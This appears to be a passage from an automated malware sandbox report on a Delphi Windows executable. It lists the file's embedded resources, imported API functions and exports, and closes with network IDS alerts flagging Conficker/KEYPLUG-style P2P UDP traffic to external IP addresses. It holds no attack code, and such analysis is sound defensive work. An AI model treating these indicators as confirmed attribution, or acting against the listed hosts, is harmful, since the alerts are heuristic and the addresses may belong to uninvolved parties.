                  RT_RCDATA | 0xecb010 | 0x480 | GIF image data, version 89a, 24 x 24 | English | United States | 0.5815972222222222
                  RT_RCDATA | 0xecb490 | 0x46a | GIF image data, version 89a, 24 x 24 | English | United States | 0.5389380530973451
                  RT_RCDATA | 0xecb8fc | 0x679 | HTML document, ASCII text, with CRLF, LF line terminators | English | United States | 0.46107423053711527
                  RT_RCDATA | 0xecbf78 | 0xacf | GIF image data, version 89a, 32 x 32 | English | United States | 0.6841344416335381
                  RT_RCDATA | 0xecca48 | 0xe34 | GIF image data, version 89a, 105 x 141 | English | United States | 1.0030253025302531
                  RT_RCDATA | 0xecd87c | 0xa25 | GIF image data, version 89a, 171 x 75 | English | United States | 1.0042356565267616
                  RT_RCDATA | 0xece2a4 | 0x4b | GIF image data, version 89a, 16 x 16 | English | United States | 0.9733333333333334
                  RT_RCDATA | 0xece2f0 | 0x3f | GIF image data, version 89a, 12 x 16 | English | United States | 1.0317460317460319
                  RT_RCDATA | 0xece330 | 0x6e | GIF image data, version 89a, 16 x 16 | English | United States | 1.009090909090909
                  RT_RCDATA | 0xece3a0 | 0x50 | GIF image data, version 89a, 16 x 16 | English | United States | 1.025
                  RT_RCDATA | 0xece3f0 | 0x6c | GIF image data, version 89a, 16 x 16 | English | United States | 1.0092592592592593
                  RT_RCDATA | 0xece45c | 0x4f | GIF image data, version 89a, 16 x 16 | English | United States | 1.0253164556962024
                  RT_RCDATA | 0xece4ac | 0x6f | GIF image data, version 89a, 17 x 16 | English | United States | 1.018018018018018
                  RT_RCDATA | 0xece51c | 0x41 | GIF image data, version 89a, 15 x 15 | English | United States | 0.9846153846153847
                  RT_RCDATA | 0xece560 | 0x3c | GIF image data, version 89a, 16 x 12 | English | United States | 1.0333333333333334
                  RT_RCDATA | 0xece59c | 0x69 | GIF image data, version 89a, 16 x 16 | English | United States | 1.019047619047619
                  RT_RCDATA | 0xece608 | 0x4d | GIF image data, version 89a, 16 x 16 | English | United States | 1.025974025974026
                  RT_RCDATA | 0xece658 | 0x71 | GIF image data, version 89a, 16 x 17 | English | United States | 1.079646017699115
                  RT_RCDATA | 0xece6cc | 0x69 | GIF image data, version 89a, 16 x 16 | English | United States | 1.0095238095238095
                  RT_RCDATA | 0xece738 | 0x4d | GIF image data, version 89a, 16 x 16 | English | United States | 1.025974025974026
                  RT_RCDATA | 0xece788 | 0x45a | HTML document, ASCII text, with CRLF line terminators | English | United States | 0.47217235188509876
                  RT_RCDATA | 0xecebe4 | 0x36 | GIF image data, version 89a, 1 x 1 | English | United States | 1.037037037037037
                  RT_RCDATA | 0xecec1c | 0x91 | GIF image data, version 89a, 16 x 16 | English | United States | 0.8137931034482758
                  RT_RCDATA | 0xececb0 | 0x82 | GIF image data, version 89a, 16 x 16 | English | United States | 0.7769230769230769
                  RT_RCDATA | 0xeced34 | 0x6c | GIF image data, version 89a, 11 x 9 | English | United States | 0.6944444444444444
                  RT_RCDATA | 0xeceda0 | 0x9e | GIF image data, version 89a, 16 x 16 | English | United States | 0.8354430379746836
                  RT_RCDATA | 0xecee40 | 0x6f | GIF image data, version 89a, 11 x 9 | English | United States | 0.7027027027027027
                  RT_RCDATA | 0xeceeb0 | 0x356 | GIF image data, version 89a, 16 x 16 | English | United States | 0.12295081967213115
                  RT_RCDATA | 0xecf208 | 0x355 | GIF image data, version 89a, 16 x 16 | English | United States | 0.123094958968347
                  RT_RCDATA | 0xecf560 | 0x355 | GIF image data, version 89a, 16 x 16 | English | United States | 0.12192262602579132
                  RT_RCDATA | 0xecf8b8 | 0x361 | GIF image data, version 89a, 16 x 16 | English | United States | 0.13179190751445086
                  RT_RCDATA | 0xecfc1c | 0x3ae | GIF image data, version 89a, 16 x 16 | English | United States | 0.25796178343949044
                  RT_RCDATA | 0xecffcc | 0x3b5 | GIF image data, version 89a, 16 x 16 | English | United States | 0.291886195995785
                  RT_RCDATA | 0xed0384 | 0x38c | GIF image data, version 89a, 16 x 16 | English | United States | 0.21585903083700442
                  RT_RCDATA | 0xed0710 | 0x41a | GIF image data, version 89a, 16 x 16 | English | United States | 0.6266666666666667
                  RT_RCDATA | 0xed0b2c | 0x36e | GIF image data, version 89a, 16 x 16 | English | United States | 0.15945330296127563
                  RT_RCDATA | 0xed0e9c | 0x36d | GIF image data, version 89a, 16 x 16 | English | United States | 0.1573546180159635
                  RT_RCDATA | 0xed120c | 0x354 | GIF image data, version 89a, 16 x 16 | English | United States | 0.11854460093896714
                  RT_RCDATA | 0xed1560 | 0x394 | GIF image data, version 89a, 16 x 16 | English | United States | 0.1965065502183406
                  RT_RCDATA | 0xed18f4 | 0x3b0 | GIF image data, version 89a, 16 x 16 | English | United States | 0.2552966101694915
                  RT_RCDATA | 0xed1ca4 | 0x3e7 | GIF image data, version 89a, 16 x 16 | English | United States | 0.42842842842842843
                  RT_RCDATA | 0xed208c | 0x3ee | GIF image data, version 89a, 16 x 16 | English | United States | 0.6272365805168986
                  RT_RCDATA | 0xed247c | 0x368 | GIF image data, version 89a, 16 x 16 | English | United States | 0.13876146788990826
                  RT_RCDATA | 0xed27e4 | 0x37f | GIF image data, version 89a, 16 x 16 | English | United States | 0.28044692737430166
                  RT_RCDATA | 0xed2b64 | 0x37f | GIF image data, version 89a, 16 x 16 | English | United States | 0.27932960893854747
                  RT_RCDATA | 0xed2ee4 | 0x362 | GIF image data, version 89a, 16 x 16 | English | United States | 0.13279445727482678
                  RT_RCDATA | 0xed3248 | 0x531b | ASCII text, with very long lines (16079) | English | United States | 0.2575323149236193
                  RT_RCDATA | 0xed8564 | 0x3457 | ASCII text, with very long lines (13399), with no line terminators | English | United States | 0.27718486454213
                  RT_RCDATA | 0xedb9bc | 0x38c1 | ASCII text, with very long lines (14529), with no line terminators | English | United States | 0.2771697983343657
                  RT_RCDATA | 0xedf280 | 0xa64 | ASCII text, with very long lines (2660), with no line terminators | English | United States | 0.3669172932330827
                  RT_RCDATA | 0xedfce4 | 0xbe1 | ASCII text, with very long lines (3041), with no line terminators | English | United States | 0.3909898059848734
                  RT_RCDATA | 0xee08c8 | 0x134a | ASCII text, with very long lines (4938), with no line terminators | English | United States | 0.24807614418793034
                  RT_RCDATA | 0xee1c14 | 0x677 | ASCII text, with very long lines (1655), with no line terminators | English | United States | 0.313595166163142
                  RT_RCDATA | 0xee228c | 0x4cd | HTML document, ASCII text, with very long lines (1229), with no line terminators | English | United States | 0.49308380797396256
                  RT_RCDATA | 0xee275c | 0x1775 | ASCII text, with very long lines (6005), with no line terminators | English | United States | 0.24196502914238135
                  RT_RCDATA | 0xee3ed4 | 0xdcd | ASCII text, with very long lines (3533), with no line terminators | English | United States | 0.3014435324087178
                  RT_RCDATA | 0xee4ca4 | 0x17278 | HTML document, Unicode text, UTF-8 text, with very long lines (32769) | English | United States | 0.354924082665542
                  RT_RCDATA | 0xefbf1c | 0xd0f | ASCII text, with very long lines (3142) | English | United States | 0.4552796889021837
                  RT_RCDATA | 0xefcc2c | 0x6ecc | ASCII text, with very long lines (28364), with no line terminators | English | United States | 0.2744676350303201
                  RT_RCDATA | 0xf03af8 | 0xc9c7 | ASCII text, with very long lines (51655), with no line terminators | English | United States | 0.24799148194753654
                  RT_RCDATA | 0xf104c0 | 0x1e82 | ASCII text, with very long lines (7146), with CRLF line terminators | English | United States | 0.3613316261203585
                  RT_RCDATA | 0xf12344 | 0xdb2 | ASCII text, with CRLF line terminators | English | United States | 0.32857957786651454
                  RT_RCDATA | 0xf130f8 | 0x1ea0 | data |  |  | 0.43839285714285714
                  RT_RCDATA | 0xf14f98 | 0x5c7 | Delphi compiled form 'TAxisIncrement' |  |  | 0.5233265720081136
                  RT_RCDATA | 0xf15560 | 0x3a7 | Delphi compiled form 'TAxisMaxMin' |  |  | 0.5187165775401069
                  RT_RCDATA | 0xf15908 | 0xc27 | Delphi compiled form 'TBackImageEditor' |  |  | 0.37254901960784315
                  RT_RCDATA | 0xf16530 | 0x108 | Delphi compiled form 'TBaseFunctionEditor' |  |  | 0.7954545454545454
                  RT_RCDATA | 0xf16638 | 0x311 | Delphi compiled form 'TBaseSourceEditor' |  |  | 0.619108280254777
                  RT_RCDATA | 0xf1694c | 0x49e | Delphi compiled form 'TBMPOptions' |  |  | 0.5609137055837563
                  RT_RCDATA | 0xf16dec | 0x19b77 | Delphi compiled form 'TBrushDialog' |  |  | 0.6545877438648122
                  RT_RCDATA | 0xf30964 | 0x2dea | Delphi compiled form 'TChartEditForm' |  |  | 0.29275140377743747
                  RT_RCDATA | 0xf33750 | 0x1759 | Delphi compiled form 'TChartPreview' |  |  | 0.3399698845574703
                  RT_RCDATA | 0xf34eac | 0x415c8 | TrueType Font data, 19 tables, 1st "GPOS", 16 names, Macintosh, \(g\)\252 fonts 1999\251ElektraMediumTransType 3 MAC;Elektra;001.000;18/07/06 23:22:47ElektraVer | English | United States | 0.10237935156133274
                  RT_RCDATA | 0xf76474 | 0x5f80 | TrueType Font data, 15 tables, 1st "OS/2", 21 names, Unicode | English | United States | 0.3445271596858639
                  RT_RCDATA | 0xf7c3f4 | 0x254 | Delphi compiled form 'TEMFOptions' |  |  | 0.6157718120805369
                  RT_RCDATA | 0xf7c648 | 0x37e0 | Delphi compiled form 'TFilterGallery' |  |  | 0.9542785234899329
                  RT_RCDATA | 0xf7fe28 | 0x15cf | Delphi compiled form 'TFiltersEditor' |  |  | 0.33799032778076304
                  RT_RCDATA | 0xf813f8 | 0x151 | Delphi compiled form 'TForm1' |  |  | 0.7210682492581603
                  RT_RCDATA | 0xf8154c | 0x99e | Delphi compiled form 'TFormatEditor' |  |  | 0.3895207148659626
                  RT_RCDATA | 0xf81eec | 0x6cd | Delphi compiled form 'TFormPreviewPanelEditor' |  |  | 0.44055140723721997
                  RT_RCDATA | 0xf825bc | 0x12ac | Delphi compiled form 'TFormTee3D' |  |  | 0.34246861924686195
                  RT_RCDATA | 0xf83868 | 0x3d05 | Delphi compiled form 'TFormTeeAxis' |  |  | 0.2504961270085142
                  RT_RCDATA | 0xf87570 | 0x2853 | Delphi compiled form 'TFormTeeGeneral' |  |  | 0.32645548774581035
                  RT_RCDATA | 0xf89dc4 | 0x1b20 | Delphi compiled form 'TFormTeeLegend' |  |  | 0.32171658986175117
                  RT_RCDATA | 0xf8b8e4 | 0x613 | Delphi compiled form 'TFormTeePage' |  |  | 0.4553054662379421
                  RT_RCDATA | 0xf8bef8 | 0x1034 | Delphi compiled form 'TFormTeePanel' |  |  | 0.3276277724204436
                  RT_RCDATA | 0xf8cf2c | 0x47c6 | Delphi compiled form 'TFormTeeSeries' |  |  | 0.2725590508326984
                  RT_RCDATA | 0xf916f4 | 0x12fc | Delphi compiled form 'TFormTeeShape' |  |  | 0.33065843621399177
                  RT_RCDATA | 0xf929f0 | 0x78e | Delphi compiled form 'TFormTeeTitle' |  |  | 0.4239917269906929
                  RT_RCDATA | 0xf93180 | 0x9d3 | Delphi compiled form 'TFormTeeWall' |  |  | 0.37296222664015904
                  RT_RCDATA | 0xf93b54 | 0x59a | Delphi compiled form 'TMarginsEditor' |  |  | 0.39609483960948394
                  RT_RCDATA | 0xf940f0 | 0x396 | Delphi compiled form 'TMouseCursorEdit' |  |  | 0.6089324618736384
                  RT_RCDATA | 0xf94488 | 0x33c2 | HTML document, ASCII text, with CRLF line terminators | Dutch | Belgium | 0.20422641509433961
                  RT_RCDATA | 0xf9784c | 0xc59 | Delphi compiled form 'TPenDialog' |  |  | 0.4134767478645998
                  RT_RCDATA | 0xf984a8 | 0x698 | Delphi compiled form 'TSelectListForm' |  |  | 0.3915876777251185
                  RT_RCDATA | 0xf98b40 | 0x1329 | Delphi compiled form 'TSeriesPointerEditor' |  |  | 0.3547400611620795
                  RT_RCDATA | 0xf99e6c | 0x558 | Delphi compiled form 'TStringsEditor' |  |  | 0.4641812865497076
                  RT_RCDATA | 0xf9a3c4 | 0x919 | Delphi compiled form 'TSymbolEditor' |  |  | 0.3714040360669815
                  RT_RCDATA | 0xf9ace0 | 0xd076 | Delphi compiled form 'TTeeAboutForm' |  |  | 0.9010793389049208
                  RT_RCDATA | 0xfa7d58 | 0x35d | Delphi compiled form '\016TTeeExportForm' |  |  | 0.5319396051103368
                  RT_RCDATA | 0xfa80b8 | 0x1c55 | Delphi compiled form 'TTeeExportFormBase' |  |  | 0.33655039294085204
                  RT_RCDATA | 0xfa9d10 | 0xc85 | Delphi compiled form 'TTeeFontEditor' |  |  | 0.39469578783151327
                  RT_RCDATA | 0xfaa998 | 0x514 | Delphi compiled form '\016TTeeFuncEditor' |  |  | 0.47
                  RT_RCDATA | 0xfaaeac | 0x3c3 | Delphi compiled form '\022TTeeFunctionEditor\021TeeFunctionEditor\004Left\003>\001\003Top\003\340' |  |  | 0.48078920041536866
                  RT_RCDATA | 0xfab270 | 0x17c0 | Delphi compiled form 'TTeeGallery' |  |  | 0.3483552631578947
                  RT_RCDATA | 0xfaca30 | 0x1661 | Delphi compiled form 'TTeeGradientEditor' |  |  | 0.3459591551754233
                  RT_RCDATA | 0xfae094 | 0xa57 | Delphi compiled form 'TTeeShadowEditor' |  |  | 0.39856441254250097
                  RT_RCDATA | 0xfaeaec | 0x8ed | Delphi compiled form 'TTextShapeEditor' |  |  | 0.4074398249452954
                  RT_RCDATA | 0xfaf3dc | 0x1cf | Delphi compiled form 'TVisualsEditor' |  |  | 0.6198704103671706
                  RT_RCDATA | 0xfaf5ac | 0x3188e | data | English | United States | 0.7320571332814179
                  RT_RCDATA | 0xfe0e3c | 0x4c651 | data | English | United States | 0.17103795623703713
                  RT_RCDATA | 0x102d490 | 0x5580d | data | English | United States | 0.2652239585861499
                  RT_GROUP_CURSOR | 0x1082ca0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
                  RT_GROUP_CURSOR | 0x1082cb4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
                  RT_GROUP_CURSOR | 0x1082cc8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
                  RT_GROUP_CURSOR | 0x1082cdc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
                  RT_GROUP_CURSOR | 0x1082cf0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
                  RT_GROUP_CURSOR | 0x1082d04 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
                  RT_GROUP_CURSOR | 0x1082d18 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
                  RT_GROUP_CURSOR | 0x1082d2c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
                  RT_GROUP_ICON | 0x1082d40 | 0x4c | data |  |  | 0.8289473684210527
                  RT_VERSION | 0x1082d8c | 0x314 | data | Chinese | China | 0.45558375634517767
                  DLL | Import
                  oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
                  advapi32.dll | RegQueryValueExW, RegOpenKeyExW, RegCloseKey
                  user32.dll | CharNextW, LoadStringW
                  kernel32.dll | Sleep, VirtualFree, VirtualAlloc, lstrlenW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsValidLocale, SetThreadLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FindResourceW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwindEx, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, WriteFile, GetStdHandle, CloseHandle
                  kernel32.dll | GetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, LocalFree, LocalAlloc, GetModuleHandleW, FreeLibrary
                  user32.dll | WINNLSEnableIME, SetClassLongPtrW, GetClassLongPtrW, SetWindowLongPtrW, GetWindowLongPtrW, CreateWindowExW, WindowFromPoint, WaitMessage, ValidateRect, UpdateLayeredWindow, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, TrackMouseEvent, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetCaretPos, SetCapture, SetActiveWindow, SendMessageTimeoutW, SendMessageA, SendMessageW, SendDlgItemMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxIndirectW, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorFromFileW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsIconic, IsDialogMessageA, IsDialogMessageW, IsClipboardFormatAvailable, IsChild, IsCharAlphaNumericW, IsCharAlphaW, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextLengthW, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowDC, GetUpdateRgn, GetUpdateRect, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMessageExtraInfo, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDlgItem, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameW, GetClassInfoExW, GetClassInfoW, GetCaretPos, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EnumChildWindows, EndPaint, EndMenu, EndDeferWindowPos, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DestroyCaret, DeleteMenu, DeferWindowPos, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, CreateCaret, CreateAcceleratorTableW, CountClipboardFormats, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, ChildWindowFromPoint, CheckMenuItem, CharUpperBuffW, CharUpperW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BeginPaint, BeginDeferWindowPos, AppendMenuW, AdjustWindowRectEx, ActivateKeyboardLayout
                  gdi32.dll | WidenPath, UnrealizeObject, TextOutW, StrokePath, StrokeAndFillPath, StretchDIBits, StretchBlt, StartPage, StartDocW, SetWindowOrgEx, SetWindowExtEx, SetWinMetaFileBits, SetViewportOrgEx, SetViewportExtEx, SetTextCharacterExtra, SetTextColor, SetTextAlign, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetMetaRgn, SetMapMode, SetGraphicsMode, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetArcDirection, SetAbortProc, SelectPalette, SelectObject, SelectClipRgn, SelectClipPath, SaveDC, RoundRect, RestoreDC, ResizePalette, Rectangle, RectVisible, RealizePalette, PtVisible, PolylineTo, Polyline, Polygon, PolyPolyline, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PathToRegion, PatBlt, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetTextCharacterExtra, GetTextAlign, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetRegionData, GetPixel, GetPaletteEntries, GetObjectA, GetObjectW, GetNearestPaletteIndex, GetMapMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetClipRgn, GetClipBox, GetCharABCWidthsFloatW, GetBrushOrgEx, GetBkMode, GetBkColor, GetBitmapBits, GdiFlush, FrameRgn, FillPath, ExtTextOutW, ExtSelectClipRgn, ExtFloodFill, ExtCreateRegion, ExtCreatePen, ExcludeClipRect, EnumFontsW, EnumFontFamiliesExW, EndPath, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRoundRectRgn, CreateRectRgn, CreatePolygonRgn, CreatePenIndirect, CreatePalette, CreateICW, CreateHalftonePalette, CreateFontIndirectW, CreateFontW, CreateEnhMetaFileW, CreateEllipticRgnIndirect, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, CombineRgn, CloseFigure, CloseEnhMetaFile, Chord, BitBlt, BeginPath, ArcTo, Arc, AngleArc, AbortDoc
                  version.dll | VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                  kernel32.dll | lstrlenW, lstrcmpW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, VerSetConditionMask, VerifyVersionInfoW, UnmapViewOfFile, TryEnterCriticalSection, SwitchToThread, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryW, ReadFile, RaiseException, QueryPerformanceFrequency, QueryPerformanceCounter, QueryDosDeviceW, IsDebuggerPresent, OutputDebugStringW, MulDiv, MapViewOfFile, LockResource, LocalFree, LoadResource, LoadLibraryW, LeaveCriticalSection, LCMapStringW, IsValidLocale, InitializeCriticalSection, HeapSize, HeapFree, HeapDestroy, HeapCreate, HeapAlloc, GlobalUnlock, GlobalSize, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetVolumeInformationW, GetVersionExW, GetVersion, GetUserDefaultLCID, GetTimeZoneInformation, GetTickCount, GetThreadPriority, GetThreadLocale, GetTempPathW, GetTempFileNameW, GetSystemDirectoryW, GetStdHandle, GetLongPathNameW, GetProfileIntW, GetProcAddress, GetPrivateProfileStringW, GetModuleHandleW, GetModuleFileNameW, GetLogicalDriveStringsW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesExW, GetFileAttributesW, GetExitCodeThread, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetComputerNameW, GetCPInfoExW, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageW, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExpandEnvironmentStringsW, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateThread, CreateFileMappingW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringA, CompareStringW, CloseHandle
                  advapi32.dll | RegUnLoadKeyW, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegConnectRegistryW, RegCloseKey
                  kernel32.dll | Sleep
                  oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                  oleaut32.dll | GetErrorInfo, SysFreeString
                  ole32.dll | CreateStreamOnHGlobal, ReleaseStgMedium, OleDraw, DoDragDrop, RevokeDragDrop, RegisterDragDrop, OleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
                  comctl32.dll | InitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_GetImageInfo, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Copy, ImageList_LoadImageW, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_SetOverlayImage, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                  user32.dll | EnumDisplayMonitors, GetMonitorInfoW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow
                  msvcrt.dll | isxdigit, isupper, isspace, ispunct, isprint, islower, isgraph, isdigit, iscntrl, isalpha, isalnum, toupper, tolower, strchr, strncmp, memset, memcpy, memcmp
                  shell32.dll | ShellExecuteW, Shell_NotifyIconW, DragQueryFileW
                  shell32.dll | SHGetSpecialFolderPathW
                  comdlg32.dll | PageSetupDlgW, PrintDlgW, ChooseFontW, ChooseColorW, GetSaveFileNameW, GetOpenFileNameW
                  winspool.drv | SetPrinterW, OpenPrinterW, GetPrinterW, GetDefaultPrinterW, EnumPrintersW, DocumentPropertiesW, DeviceCapabilitiesW, ClosePrinter
                  winspool.drv | GetDefaultPrinterW
                  winmm.dll | timeGetTime
                  kernel32.dll | MulDiv
                  d3d9.dll | Direct3DCreate9
                  Name | Ordinal | Address
                  TMethodImplementationIntercept | 3 | 0x4a5f60
                  __dbk_fcall_wrapper | 2 | 0x418520
                  dbkFCallWrapperAddr | 1 | 0x112ef58
                  Language of compilation system | Country where language is spoken | Map
                  English | United States
                  Dutch | Belgium
                  Chinese | China
                  Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                  2024-12-06T14:21:15.965055+01002009207ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 5)1192.168.2.527080122.18.238.13411749UDP
                  2024-12-06T14:21:20.215395+01002009206ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 4)1192.168.2.52708062.113.245.7618771UDP
                  2024-12-06T14:21:23.373929+01002009205ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 1)1192.168.2.52708072.221.27.4619892UDP
                  2024-12-06T14:21:23.373965+01002009208ET MALWARE Possible Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 16)1192.168.2.52708065.191.158.522146UDP
                  2024-12-06T14:21:49.325449+01002009207ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 5)1192.168.2.52708089.117.55.22816717UDP
                  2024-12-06T14:21:56.324082+01002009208ET MALWARE Possible Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 16)1192.168.2.527080135.181.195.24030302UDP
                  2024-12-06T14:21:57.323517+01002009206ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 4)1192.168.2.527080118.178.193.22011030UDP
                  2024-12-06T14:22:09.417128+01002009205ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 1)1192.168.2.52708073.195.118.7623154UDP
                  2024-12-06T14:22:27.577527+01002009207ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 5)1192.168.2.52708023.137.250.4324642UDP
                  2024-12-06T14:22:35.589495+01002009206ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 4)1192.168.2.527080174.2.11.19117369UDP
                  2024-12-06T14:22:36.588670+01002009208ET MALWARE Possible Downadup/Conficker-C P2P encrypted traffic UDP Ping Packet (bit value 16)1192.168.2.5270802.178.163.16730497UDP
